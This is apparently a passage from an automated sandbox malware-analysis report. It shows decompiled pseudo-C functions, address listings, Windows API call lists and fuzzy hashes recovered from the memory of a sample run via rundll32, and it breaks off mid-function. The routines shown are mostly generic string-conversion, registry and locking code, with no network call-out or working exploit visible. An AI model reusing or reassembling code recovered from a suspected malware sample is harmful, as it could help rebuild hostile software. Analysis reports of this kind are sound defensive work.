                                                                                              0x0428b532
                                                                                              0x0428b534
                                                                                              0x0428b536
                                                                                              0x0428b577
                                                                                              0x0428b577
                                                                                              0x0428b579
                                                                                              0x0428b586
                                                                                              0x0428b586
                                                                                              0x0428b588
                                                                                              0x0428b58a
                                                                                              0x0428b58b
                                                                                              0x0428b58c
                                                                                              0x0428b593
                                                                                              0x0428b596
                                                                                              0x0428b598
                                                                                              0x0428b598
                                                                                              0x0428b599
                                                                                              0x0428b59b
                                                                                              0x0428b59e
                                                                                              0x0428b59e
                                                                                              0x0428b5a0
                                                                                              0x0428b5a2
                                                                                              0x00000000
                                                                                              0x0428b5a2
                                                                                              0x0428b57b
                                                                                              0x0428b57d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b57f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b581
                                                                                              0x0428b584
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b584
                                                                                              0x0428b53d
                                                                                              0x0428b543
                                                                                              0x0428b543
                                                                                              0x0428b545
                                                                                              0x0428b546
                                                                                              0x0428b547
                                                                                              0x0428b548
                                                                                              0x0428b54f
                                                                                              0x0428b552
                                                                                              0x0428b554
                                                                                              0x0428b555
                                                                                              0x0428b557
                                                                                              0x0428b564
                                                                                              0x0428b564
                                                                                              0x0428b566
                                                                                              0x0428b568
                                                                                              0x0428b569
                                                                                              0x0428b56a
                                                                                              0x0428b571
                                                                                              0x0428b574
                                                                                              0x0428b576
                                                                                              0x0428b576
                                                                                              0x00000000
                                                                                              0x0428b576
                                                                                              0x0428b559
                                                                                              0x0428b559
                                                                                              0x0428b55b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b55d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b55f
                                                                                              0x0428b562
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b562
                                                                                              0x0428b53f
                                                                                              0x0428b541
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b541
                                                                                              0x0428b512
                                                                                              0x0428b514
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428b514
                                                                                              0x0428b50e
                                                                                              0x00000000
                                                                                              0x0428b3f8
                                                                                              0x0428b3f3
                                                                                              0x0428b31a
                                                                                              0x0428b31c
                                                                                              0x00000000
                                                                                              0x0428b31e
                                                                                              0x0428b334
                                                                                              0x0428b339
                                                                                              0x0428b33b
                                                                                              0x0428b347
                                                                                              0x0428b34d
                                                                                              0x0428b34e
                                                                                              0x0428b350
                                                                                              0x0428b352
                                                                                              0x0428b35d
                                                                                              0x0428b35d
                                                                                              0x0428b360
                                                                                              0x0428b362
                                                                                              0x0428b362
                                                                                              0x0428b365
                                                                                              0x0428b33d
                                                                                              0x0428b33d
                                                                                              0x0428b33d
                                                                                              0x00000000
                                                                                              0x0428b33b
                                                                                              0x0428b2ea
                                                                                              0x0428b2ea
                                                                                              0x0428b2f1
                                                                                              0x0428b2f2
                                                                                              0x0428b2f4
                                                                                              0x0428b5a6
                                                                                              0x0428b5aa
                                                                                              0x0428b5af
                                                                                              0x0428b5af
                                                                                              0x0428b5be
                                                                                              0x0428b5be

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 56d7df094b96d399631f2e70f396444e24e0827d77f7372ca130cc79345a1ebe
                                                                                              • Instruction ID: 1e55be0862ed2d53395ab258f24f28fe19259d6a2279ffd0bcf49303caddc674
                                                                                              • Opcode Fuzzy Hash: 56d7df094b96d399631f2e70f396444e24e0827d77f7372ca130cc79345a1ebe
                                                                                              • Instruction Fuzzy Hash: E4A15571B223869FEB21EE28C8917BEBFE1EF05350F18416DE5859B2C1C238B941C750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 81%
                                                                                              			E0428C27A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                              				signed int _v8;
                                                                                              				int _v12;
                                                                                              				char _v16;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v28;
                                                                                              				void* _v40;
                                                                                              				signed int _t34;
                                                                                              				signed int _t40;
                                                                                              				int _t46;
                                                                                              				int _t53;
                                                                                              				void* _t55;
                                                                                              				int _t57;
                                                                                              				signed int _t63;
                                                                                              				int _t67;
                                                                                              				short* _t69;
                                                                                              				signed int _t70;
                                                                                              				short* _t71;
                                                                                              
                                                                                              				_t34 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t34 ^ _t70;
                                                                                              				E0427EF84(__ebx,  &_v28, __edx, _a4);
                                                                                              				_t57 = _a24;
                                                                                              				if(_t57 == 0) {
                                                                                              					_t53 =  *(_v24 + 8);
                                                                                              					_t57 = _t53;
                                                                                              					_a24 = _t53;
                                                                                              				}
                                                                                              				_t67 = 0;
                                                                                              				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                              				_v12 = _t40;
                                                                                              				if(_t40 == 0) {
                                                                                              					L15:
                                                                                              					if(_v16 != 0) {
                                                                                              						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                              					}
                                                                                              					return E04275AFE(_v8 ^ _t70);
                                                                                              				}
                                                                                              				_t55 = _t40 + _t40;
                                                                                              				_t17 = _t55 + 8; // 0x9
                                                                                              				asm("sbb eax, eax");
                                                                                              				if((_t17 & _t40) == 0) {
                                                                                              					_t69 = 0;
                                                                                              					L11:
                                                                                              					if(_t69 != 0) {
                                                                                              						E0427DEA0(_t67, _t69, _t67, _t55);
                                                                                              						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                              						if(_t46 != 0) {
                                                                                              							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                              						}
                                                                                              					}
                                                                                              					L14:
                                                                                              					E0427F190(_t69);
                                                                                              					goto L15;
                                                                                              				}
                                                                                              				_t20 = _t55 + 8; // 0x9
                                                                                              				asm("sbb eax, eax");
                                                                                              				_t48 = _t40 & _t20;
                                                                                              				_t21 = _t55 + 8; // 0x9
                                                                                              				_t63 = _t21;
                                                                                              				if((_t40 & _t20) > 0x400) {
                                                                                              					asm("sbb eax, eax");
                                                                                              					_t69 = E042884E7(_t63, _t48 & _t63);
                                                                                              					if(_t69 == 0) {
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					 *_t69 = 0xdddd;
                                                                                              					L9:
                                                                                              					_t69 =  &(_t69[4]);
                                                                                              					goto L11;
                                                                                              				}
                                                                                              				asm("sbb eax, eax");
                                                                                              				E04291860();
                                                                                              				_t69 = _t71;
                                                                                              				if(_t69 == 0) {
                                                                                              					goto L14;
                                                                                              				}
                                                                                              				 *_t69 = 0xcccc;
                                                                                              				goto L9;
                                                                                              			}




















                                                                                              0x0428c282
                                                                                              0x0428c289
                                                                                              0x0428c295
                                                                                              0x0428c29a
                                                                                              0x0428c29f
                                                                                              0x0428c2a4
                                                                                              0x0428c2a7
                                                                                              0x0428c2a9
                                                                                              0x0428c2a9
                                                                                              0x0428c2ae
                                                                                              0x0428c2c7
                                                                                              0x0428c2cd
                                                                                              0x0428c2d2
                                                                                              0x0428c371
                                                                                              0x0428c375
                                                                                              0x0428c37a
                                                                                              0x0428c37a
                                                                                              0x0428c396
                                                                                              0x0428c396
                                                                                              0x0428c2d8
                                                                                              0x0428c2db
                                                                                              0x0428c2e0
                                                                                              0x0428c2e4
                                                                                              0x0428c330
                                                                                              0x0428c332
                                                                                              0x0428c334
                                                                                              0x0428c339
                                                                                              0x0428c350
                                                                                              0x0428c358
                                                                                              0x0428c368
                                                                                              0x0428c368
                                                                                              0x0428c358
                                                                                              0x0428c36a
                                                                                              0x0428c36b
                                                                                              0x00000000
                                                                                              0x0428c370
                                                                                              0x0428c2e6
                                                                                              0x0428c2eb
                                                                                              0x0428c2ed
                                                                                              0x0428c2ef
                                                                                              0x0428c2ef
                                                                                              0x0428c2f7
                                                                                              0x0428c314
                                                                                              0x0428c31e
                                                                                              0x0428c323
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c325
                                                                                              0x0428c32b
                                                                                              0x0428c32b
                                                                                              0x00000000
                                                                                              0x0428c32b
                                                                                              0x0428c2fb
                                                                                              0x0428c2ff
                                                                                              0x0428c304
                                                                                              0x0428c308
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c30a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,0428AE40,?,00000000,00000001,00000001,?,?,00000001,0428AE40,?), ref: 0428C2C7
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0428C350
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0427FA21,?), ref: 0428C362
                                                                                              • __freea.LIBCMT ref: 0428C36B
                                                                                                • Part of subcall function 042884E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04288519
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: c2ab1c4337b6f263b86ce870b8fbf0f8c78eadb9b1d4826e776af7d437eeb5c2
                                                                                              • Instruction ID: b9e07d0e668300e3e225c9fba064fd242c1b6d984192a0463ef8985c5fa5a75d
                                                                                              • Opcode Fuzzy Hash: c2ab1c4337b6f263b86ce870b8fbf0f8c78eadb9b1d4826e776af7d437eeb5c2
                                                                                              • Instruction Fuzzy Hash: AD31CE72B2120AABEF25AF76DC44DAFBBA5EB40714F05412CEC05D6190EB35EC51DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 34%
                                                                                              			E0426D5B0(signed int __eax, void* __ebx, char** __ecx, void* __edi, void* __esi, int _a4, int _a8) {
                                                                                              				char* _v0;
                                                                                              				signed int _t15;
                                                                                              				short* _t16;
                                                                                              				signed int _t19;
                                                                                              				signed short _t27;
                                                                                              				char* _t31;
                                                                                              				short* _t36;
                                                                                              				short _t39;
                                                                                              				char** _t40;
                                                                                              				char** _t41;
                                                                                              				short* _t43;
                                                                                              				int _t44;
                                                                                              				char* _t48;
                                                                                              				int _t51;
                                                                                              				void* _t54;
                                                                                              				char** _t56;
                                                                                              				int _t58;
                                                                                              				void* _t62;
                                                                                              				void* _t66;
                                                                                              				void* _t67;
                                                                                              
                                                                                              				_t15 = __eax;
                                                                                              				_t62 = _t66;
                                                                                              				_t36 = _a4;
                                                                                              				_t46 = __ecx;
                                                                                              				if(_t36 != 0) {
                                                                                              					_t16 = _t36;
                                                                                              					_t43 =  &(_t16[1]);
                                                                                              					do {
                                                                                              						_t39 =  *_t16;
                                                                                              						_t16 =  &(_t16[1]);
                                                                                              					} while (_t39 != 0);
                                                                                              					_t19 = (_t16 - _t43 >> 1) + 1;
                                                                                              					_a4 = _t19;
                                                                                              					_push(_t39);
                                                                                              					_t51 = _t19 * 4;
                                                                                              					_t40 = __ecx;
                                                                                              					_t44 = _t51;
                                                                                              					_push( &(__ecx[1]));
                                                                                              					L12();
                                                                                              					_t67 = _t66 + 8;
                                                                                              					_t15 = WideCharToMultiByte(_a8, 0, _t36, _a4,  *__ecx, _t51, 0, 0);
                                                                                              					asm("sbb esi, esi");
                                                                                              					_t54 =  ~_t15 + 1;
                                                                                              					if(_t54 != 0) {
                                                                                              						_t15 = GetLastError();
                                                                                              						if(_t15 == 0x7a) {
                                                                                              							_t58 = WideCharToMultiByte(_a8, 0, _t36, _a4, 0, 0, 0, 0);
                                                                                              							_push(_t40);
                                                                                              							_push( &(_t46[1]));
                                                                                              							_t44 = _t58;
                                                                                              							L12();
                                                                                              							_t67 = _t67 + 8;
                                                                                              							_t15 = WideCharToMultiByte(_a8, 0, _t36, _a4,  *_t46, _t58, 0, 0);
                                                                                              							asm("sbb esi, esi");
                                                                                              							_t54 =  ~_t15 + 1;
                                                                                              						}
                                                                                              					}
                                                                                              					_pop(_t55);
                                                                                              					if(_t54 == 0) {
                                                                                              						goto L2;
                                                                                              					} else {
                                                                                              						_t21 =  *_t46;
                                                                                              						_t41 =  &(_t46[1]);
                                                                                              						if( *_t46 != _t41) {
                                                                                              							L0427ED17(_t21);
                                                                                              							_t67 = _t67 + 4;
                                                                                              						}
                                                                                              						L32();
                                                                                              						asm("int3");
                                                                                              						_push(_t62);
                                                                                              						_t56 = _t41;
                                                                                              						_push(_t46);
                                                                                              						if(_t56 == 0) {
                                                                                              							_push(0x80070057);
                                                                                              							E04257AC0();
                                                                                              							goto L28;
                                                                                              						} else {
                                                                                              							if(_t44 < 0) {
                                                                                              								L28:
                                                                                              								_push(0x80070057);
                                                                                              								E04257AC0();
                                                                                              								goto L29;
                                                                                              							} else {
                                                                                              								_t48 = _v0;
                                                                                              								if(_t48 == 0) {
                                                                                              									L29:
                                                                                              									_push(0x80070057);
                                                                                              									E04257AC0();
                                                                                              									goto L30;
                                                                                              								} else {
                                                                                              									_t31 =  *_t56;
                                                                                              									if(_t31 == _t48) {
                                                                                              										if(_t44 <= 0x80) {
                                                                                              											goto L20;
                                                                                              										} else {
                                                                                              											_push(1);
                                                                                              											_push(_t44);
                                                                                              											_t31 = E0428718E(_t41);
                                                                                              											goto L25;
                                                                                              										}
                                                                                              										goto L21;
                                                                                              									} else {
                                                                                              										if(_t44 <= 0x80) {
                                                                                              											_t31 = L0427ED17(_t31);
                                                                                              											L20:
                                                                                              											 *_t56 = _t48;
                                                                                              											goto L21;
                                                                                              										} else {
                                                                                              											_push(1);
                                                                                              											_push(_t44);
                                                                                              											_t31 = E04281785(_t31);
                                                                                              											if(_t31 != 0) {
                                                                                              												L25:
                                                                                              												 *_t56 = _t31;
                                                                                              												L21:
                                                                                              												if( *_t56 != 0) {
                                                                                              													return _t31;
                                                                                              												} else {
                                                                                              													goto L31;
                                                                                              												}
                                                                                              											} else {
                                                                                              												L30:
                                                                                              												_push(0x8007000e);
                                                                                              												E04257AC0();
                                                                                              												L31:
                                                                                              												_push(0x8007000e);
                                                                                              												E04257AC0();
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												_t27 = GetLastError();
                                                                                              												if(_t27 > 0) {
                                                                                              													_t27 = _t27 & 0x0000ffff | 0x80070000;
                                                                                              												}
                                                                                              												_push(_t27);
                                                                                              												E04257AC0();
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												return 0x42a7b60;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					 *__ecx = _t36;
                                                                                              					L2:
                                                                                              					return _t15;
                                                                                              				}
                                                                                              			}























                                                                                              0x0426d5b0
                                                                                              0x0426d5b1
                                                                                              0x0426d5b4
                                                                                              0x0426d5b8
                                                                                              0x0426d5bc
                                                                                              0x0426d5c6
                                                                                              0x0426d5c8
                                                                                              0x0426d5d0
                                                                                              0x0426d5d0
                                                                                              0x0426d5d3
                                                                                              0x0426d5d6
                                                                                              0x0426d5df
                                                                                              0x0426d5e1
                                                                                              0x0426d5e4
                                                                                              0x0426d5e5
                                                                                              0x0426d5ec
                                                                                              0x0426d5f1
                                                                                              0x0426d5f3
                                                                                              0x0426d5f4
                                                                                              0x0426d5f9
                                                                                              0x0426d60c
                                                                                              0x0426d616
                                                                                              0x0426d618
                                                                                              0x0426d61b
                                                                                              0x0426d61d
                                                                                              0x0426d626
                                                                                              0x0426d63f
                                                                                              0x0426d644
                                                                                              0x0426d645
                                                                                              0x0426d646
                                                                                              0x0426d64a
                                                                                              0x0426d64f
                                                                                              0x0426d662
                                                                                              0x0426d66c
                                                                                              0x0426d66e
                                                                                              0x0426d66e
                                                                                              0x0426d626
                                                                                              0x0426d671
                                                                                              0x0426d672
                                                                                              0x00000000
                                                                                              0x0426d678
                                                                                              0x0426d678
                                                                                              0x0426d67a
                                                                                              0x0426d67f
                                                                                              0x0426d682
                                                                                              0x0426d687
                                                                                              0x0426d687
                                                                                              0x0426d68a
                                                                                              0x0426d68f
                                                                                              0x0426d690
                                                                                              0x0426d694
                                                                                              0x0426d696
                                                                                              0x0426d699
                                                                                              0x0426d6f3
                                                                                              0x0426d6f8
                                                                                              0x00000000
                                                                                              0x0426d69b
                                                                                              0x0426d69d
                                                                                              0x0426d6fd
                                                                                              0x0426d6fd
                                                                                              0x0426d702
                                                                                              0x00000000
                                                                                              0x0426d69f
                                                                                              0x0426d69f
                                                                                              0x0426d6a4
                                                                                              0x0426d707
                                                                                              0x0426d707
                                                                                              0x0426d70c
                                                                                              0x00000000
                                                                                              0x0426d6a6
                                                                                              0x0426d6a6
                                                                                              0x0426d6aa
                                                                                              0x0426d6e0
                                                                                              0x00000000
                                                                                              0x0426d6e2
                                                                                              0x0426d6e2
                                                                                              0x0426d6e4
                                                                                              0x0426d6e5
                                                                                              0x00000000
                                                                                              0x0426d6ea
                                                                                              0x00000000
                                                                                              0x0426d6ac
                                                                                              0x0426d6b2
                                                                                              0x0426d6c7
                                                                                              0x0426d6cf
                                                                                              0x0426d6cf
                                                                                              0x00000000
                                                                                              0x0426d6b4
                                                                                              0x0426d6b4
                                                                                              0x0426d6b6
                                                                                              0x0426d6b8
                                                                                              0x0426d6c2
                                                                                              0x0426d6ed
                                                                                              0x0426d6ed
                                                                                              0x0426d6d1
                                                                                              0x0426d6d6
                                                                                              0x0426d6f2
                                                                                              0x0426d6d8
                                                                                              0x00000000
                                                                                              0x0426d6d8
                                                                                              0x0426d6c4
                                                                                              0x0426d711
                                                                                              0x0426d711
                                                                                              0x0426d716
                                                                                              0x0426d71b
                                                                                              0x0426d71b
                                                                                              0x0426d720
                                                                                              0x0426d725
                                                                                              0x0426d726
                                                                                              0x0426d727
                                                                                              0x0426d728
                                                                                              0x0426d729
                                                                                              0x0426d72a
                                                                                              0x0426d72b
                                                                                              0x0426d72c
                                                                                              0x0426d72d
                                                                                              0x0426d72e
                                                                                              0x0426d72f
                                                                                              0x0426d730
                                                                                              0x0426d738
                                                                                              0x0426d73d
                                                                                              0x0426d73d
                                                                                              0x0426d742
                                                                                              0x0426d743
                                                                                              0x0426d748
                                                                                              0x0426d749
                                                                                              0x0426d74a
                                                                                              0x0426d74b
                                                                                              0x0426d74c
                                                                                              0x0426d74d
                                                                                              0x0426d74e
                                                                                              0x0426d74f
                                                                                              0x0426d755
                                                                                              0x0426d755
                                                                                              0x0426d6c2
                                                                                              0x0426d6b2
                                                                                              0x0426d6aa
                                                                                              0x0426d6a4
                                                                                              0x0426d69d
                                                                                              0x0426d699
                                                                                              0x0426d5be
                                                                                              0x0426d5be
                                                                                              0x0426d5c0
                                                                                              0x0426d5c3
                                                                                              0x0426d5c3

                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0426D60C
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 0426D61D
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0426D639
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0426D662
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              • Opcode ID: cd6af7644990f0505891b110632a5055a71e079cba78b8e9168c9d45b9529dfb
                                                                                              • Instruction ID: 547848d832baba502f1d5e42446b02be4664ef7ff34d0560f2ecfd4cdcbfb8cc
                                                                                              • Opcode Fuzzy Hash: cd6af7644990f0505891b110632a5055a71e079cba78b8e9168c9d45b9529dfb
                                                                                              • Instruction Fuzzy Hash: 22214B76720216BBDB201F14EC44FAA7B29EF04754F248211FD0ADB280EB71BD5087D4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 61%
                                                                                              			E042610F0(intOrPtr __ecx, intOrPtr* _a4, void* _a8) {
                                                                                              				long _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				int _v16;
                                                                                              				void** _v20;
                                                                                              				char _v24;
                                                                                              				char _t26;
                                                                                              				void* _t28;
                                                                                              				long _t29;
                                                                                              				void* _t37;
                                                                                              				void* _t42;
                                                                                              				void* _t43;
                                                                                              				char* _t45;
                                                                                              				void** _t49;
                                                                                              				void* _t51;
                                                                                              				intOrPtr _t52;
                                                                                              				short* _t53;
                                                                                              
                                                                                              				_t42 = _a8;
                                                                                              				_t49 = _a4 + 1;
                                                                                              				_v12 = __ecx;
                                                                                              				_v20 = _t49;
                                                                                              				_t26 = _t42 - 1 + _t49;
                                                                                              				_v16 = 0;
                                                                                              				_v24 = _t26;
                                                                                              				if(_t26 - _t49 >= 4) {
                                                                                              					_t51 =  *_t49;
                                                                                              					_v20 =  &(_t49[1]);
                                                                                              				} else {
                                                                                              					_v16 = 1;
                                                                                              					_t51 = 0;
                                                                                              				}
                                                                                              				_t45 =  &_v24;
                                                                                              				_t28 = E04260D20(_t45);
                                                                                              				_t53 = _t28;
                                                                                              				if(_v16 == 0) {
                                                                                              					_t29 = _t42 + 4;
                                                                                              					_v8 = _t29;
                                                                                              					_t43 = LocalAlloc(0x40, _t29);
                                                                                              					E0427E060(_t43, _a4, _a8);
                                                                                              					_a8 = 0;
                                                                                              					_a4 = _a8 + _t43;
                                                                                              					RegCreateKeyExW(_t51, _t53, 0, 0, 0, 0x104, 0,  &_a8, 0);
                                                                                              					asm("sbb edi, edi");
                                                                                              					_t37 = _a8;
                                                                                              					_t52 = _t51 + 1;
                                                                                              					if(_t37 != 0) {
                                                                                              						RegCloseKey(_t37);
                                                                                              					}
                                                                                              					_push(_t45);
                                                                                              					_push(0x3f);
                                                                                              					_push(_v8);
                                                                                              					 *_a4 = _t52;
                                                                                              					_push(_t43);
                                                                                              					E04251C60( *((intOrPtr*)(_v12 + 4)));
                                                                                              					_t28 = LocalFree(_t43);
                                                                                              					if(_t53 != 0) {
                                                                                              						return E04275B0F(_t53);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t28;
                                                                                              			}



















                                                                                              0x042610fa
                                                                                              0x042610fd
                                                                                              0x04261100
                                                                                              0x04261106
                                                                                              0x04261109
                                                                                              0x0426110b
                                                                                              0x04261112
                                                                                              0x0426111a
                                                                                              0x04261127
                                                                                              0x0426112c
                                                                                              0x0426111c
                                                                                              0x0426111c
                                                                                              0x04261123
                                                                                              0x04261123
                                                                                              0x0426112f
                                                                                              0x04261132
                                                                                              0x0426113b
                                                                                              0x0426113d
                                                                                              0x04261143
                                                                                              0x04261149
                                                                                              0x04261155
                                                                                              0x0426115b
                                                                                              0x04261168
                                                                                              0x0426116f
                                                                                              0x04261187
                                                                                              0x0426118f
                                                                                              0x04261191
                                                                                              0x04261194
                                                                                              0x04261197
                                                                                              0x0426119a
                                                                                              0x0426119a
                                                                                              0x042611a3
                                                                                              0x042611a7
                                                                                              0x042611a9
                                                                                              0x042611ac
                                                                                              0x042611b1
                                                                                              0x042611b2
                                                                                              0x042611b8
                                                                                              0x042611c0
                                                                                              0x00000000
                                                                                              0x042611c8
                                                                                              0x042611c0
                                                                                              0x042611d1

                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0426114C
                                                                                              • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04261187
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 0426119A
                                                                                              • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 042611B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$AllocCloseCreateFree
                                                                                              • String ID:
                                                                                              • API String ID: 1942913825-0
                                                                                              • Opcode ID: 41279aedcc089e611c9e3ff0cc7e731a8eeaab3614bab3e3d2a4168d6740a29e
                                                                                              • Instruction ID: 26681a5e6c5646bca7228be3e500f7aa0ea8af66337073c88110ddd1d3a51478
                                                                                              • Opcode Fuzzy Hash: 41279aedcc089e611c9e3ff0cc7e731a8eeaab3614bab3e3d2a4168d6740a29e
                                                                                              • Instruction Fuzzy Hash: B92161B1B00208BBDB04DF65DC84BAEBBB8EF44354F10C165F906AB281D675AA55CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 65%
                                                                                              			E04271B00(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* _t22;
                                                                                              				intOrPtr _t24;
                                                                                              				void* _t30;
                                                                                              				void* _t42;
                                                                                              				struct _CRITICAL_SECTION* _t49;
                                                                                              				void* _t52;
                                                                                              				void* _t53;
                                                                                              				void* _t54;
                                                                                              
                                                                                              				_t30 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x24)) == 2) {
                                                                                              					_push(_t42);
                                                                                              					_t49 = __ecx + 0x28;
                                                                                              					EnterCriticalSection(_t49);
                                                                                              					if( *((intOrPtr*)(_t30 + 0x24)) == 2) {
                                                                                              						_t21 = _a8;
                                                                                              						if(_a8 >= 0x18) {
                                                                                              							_t22 = E04270780(_t30,  *((intOrPtr*)(_t30 + 0x40)), _a4, _t42, _t21);
                                                                                              							_t53 = _t52 + 4;
                                                                                              							if(_t22 != 0) {
                                                                                              								goto L5;
                                                                                              							} else {
                                                                                              								_t24 = E0426FFD0(_t22,  *((intOrPtr*)(_t30 + 0x40)), _a12, _a16);
                                                                                              								_t54 = _t53 + 4;
                                                                                              								_a8 = _t24;
                                                                                              								if(_t24 < 0) {
                                                                                              									L10:
                                                                                              									if(_t24 != 0xfffffffd) {
                                                                                              										LeaveCriticalSection(_t49);
                                                                                              										E04271D50(_t30, 1);
                                                                                              										return 0;
                                                                                              									} else {
                                                                                              										_push(0x5b6);
                                                                                              										goto L12;
                                                                                              									}
                                                                                              								} else {
                                                                                              									while(1) {
                                                                                              										_push(_a8);
                                                                                              										_push(_a12);
                                                                                              										asm("sbb edi, edi");
                                                                                              										_push( ~( *(_t30 + 8)) &  *(_t30 + 8) + 0x00000004);
                                                                                              										if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t30 + 4)) + 4)) + 0xa8))() == 2) {
                                                                                              											goto L13;
                                                                                              										}
                                                                                              										_t24 = E0426FFD0(_t28,  *((intOrPtr*)(_t30 + 0x40)), _a12, _a16);
                                                                                              										_t54 = _t54 + 4;
                                                                                              										_a8 = _t24;
                                                                                              										if(_t24 >= 0) {
                                                                                              											continue;
                                                                                              										} else {
                                                                                              											goto L10;
                                                                                              										}
                                                                                              										goto L15;
                                                                                              									}
                                                                                              									goto L13;
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							L5:
                                                                                              							_push(0xd);
                                                                                              							goto L12;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(0x139f);
                                                                                              						L12:
                                                                                              						__imp__#112();
                                                                                              						L13:
                                                                                              						LeaveCriticalSection(_t49);
